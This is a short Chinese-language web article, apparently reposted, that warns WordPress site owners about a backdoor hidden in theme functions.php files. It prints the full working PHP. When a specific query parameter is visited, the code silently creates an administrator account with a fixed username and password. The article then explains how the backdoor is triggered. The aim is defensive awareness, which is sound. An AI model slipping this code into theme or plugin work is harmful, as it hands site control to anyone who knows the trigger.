防范wordpress主题加后门代码获取管理员权限


本文整理自网络,侵删。


代码如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……


标签:WordPress

相关阅读 >>

wordpress 3.0 十大看点 cms功能进一步增强

且谈wordpress性能优化分享

wordpress 文章摘要功能实现代码

wordpress小工具制作方法【附近期评论工具制作】

整理的一些实用wordpress后台mysql操作命令

phpstudy如何安装wordpress

wordpress搜索结果按浏览量排序的实现方法

wordpress模板常用函数集锦

解析wordpress中函数钩子hook的作用及基本用法

nginx下修改wordpress固定链接导致无法访问的问题解决

更多相关阅读请进入《wordpress》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...